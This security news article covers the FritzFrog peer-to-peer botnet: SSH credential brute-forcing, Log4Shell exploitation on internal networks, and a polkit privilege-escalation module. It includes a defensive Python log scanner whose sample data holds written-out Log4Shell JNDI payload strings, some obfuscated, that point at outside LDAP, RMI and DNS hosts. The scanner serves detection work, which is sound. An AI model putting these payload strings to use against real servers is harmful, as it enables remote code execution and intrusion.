
FritzFrog Botnet Targeting Linux Servers for SSH Credential Theft


The FritzFrog botnet, first identified in 2020, is a sophisticated peer-to-peer botnet written in Go that can run on AMD- and ARM-based devices. The malware has been updated continually, adding and enhancing features over time.

Recently, a new strain of the FritzFrog botnet was discovered exploiting the Log4Shell vulnerability to target all hosts within the internal network. In addition, the malware attacks servers accessible over the internet by using weak SSH credentials.

The newer versions of the FritzFrog botnet are more sophisticated and now read several system files on compromised hosts to detect potential targets that are highly likely to be vulnerable. This allows the malware to identify and exploit specific vulnerabilities on targeted systems more efficiently.

The exploitation chain used by FritzFrog has evolved over time. While the only infection vector previously used was SSH brute force, more recent iterations of the malware have added the Log4Shell exploitation, referred to as “Frog4Shell.”

The Log4Shell vulnerability was discovered in the popular open-source Log4j logging library in 2021, prompting a global effort to patch affected software. Presently, the malware targets every host on the internal network as part of its spreading routine, attempting to connect to every address on the local network.
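Log4Shell exploitation attempts of the kind described above leave traces in web server access logs, because the malicious lookup string has to arrive in a logged field such as a URL parameter or User-Agent header. The following Python is an added example, not part of the original article or of the researchers' detection script: it scans constructed Apache-style access-log lines for Log4j lookup strings, undoing URL encoding and the nested `${lower:..}` / `${upper:..}` / `${..:-..}` lookup forms that defeat a naive substring match. The log lines, IP addresses and regular expressions are all constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). Only 10.0.0.7 and
# 10.0.0.9 carry a Log4j lookup; the first line is ordinary traffic.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /login HTTP/1.1" 200 1024 "-" '
    '"${jndi:ldap://198.51.100.9:1389/a}"',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] '
    '"GET /?x=${${lower:j}ndi:${lower:r}mi://198.51.100.9/b} HTTP/1.1" 400 0 "-" "curl/8.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] '
    '"GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fexample.test%2Fc%7D HTTP/1.1" 200 10 "-" "-"',
]

# ${lower:x} / ${upper:x} evaluate to x; ${anything:-x} evaluates to x.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^}]*?:-([^}]*)\}")
# The marker we actually care about once obfuscation is stripped.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str) -> str:
    """Undo URL encoding and nested Log4j lookups until the text stops changing."""
    text = unquote(text)
    prev = None
    while prev != text:
        prev = text
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def find_log4shell_probes(lines):
    """Return the source IP of every access-log line carrying a JNDI lookup."""
    hits = []
    for line in lines:
        if _JNDI.search(normalize(line)):
            hits.append(line.split(" ", 1)[0])
    return hits


if __name__ == "__main__":
    for ip in find_log4shell_probes(SAMPLE_ACCESS_LOG):
        print("possible Log4Shell probe from", ip)
```

The loop in `normalize` matters: a payload such as `${${lower:j}ndi:...}` only exposes the `${jndi:` marker after the inner lookup has been collapsed, so a single-pass regex on the raw line would miss it. On a real server the same function can be pointed at the access log of any HTTP service that the article says FritzFrog probes on its chosen ports.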

According to researchers, internal computers, which were less likely to be exploited, were frequently overlooked and went unpatched—a situation that FritzFrog takes advantage of.

FritzFrog has also expanded its targeting capabilities by searching for HTTP servers on specific ports to identify possible Log4Shell targets. It has likewise improved its selection of SSH brute-force targets by reading multiple system logs on each of its victims, in addition to targeting randomly generated IP addresses.

Additionally, the malware now includes a module that exploits CVE-2021-4034, a privilege escalation vulnerability in the polkit component of Linux, which allows the malware to run as root on vulnerable servers.

In response to the evolving threat posed by FritzFrog, researchers have recommended implementing network segmentation to prevent the lateral movement of the malware. They have also provided a FritzFrog detection script for use on SSH servers, which searches for specific indicators of the malware’s presence.

Overall, the discovery and continued evolution of the FritzFrog botnet highlight the importance of ongoing vigilance and proactive measures to mitigate the threat posed by sophisticated malware. It also serves as a reminder of the critical need for timely software updates and security patches to protect against vulnerabilities that threat actors continue to exploit.
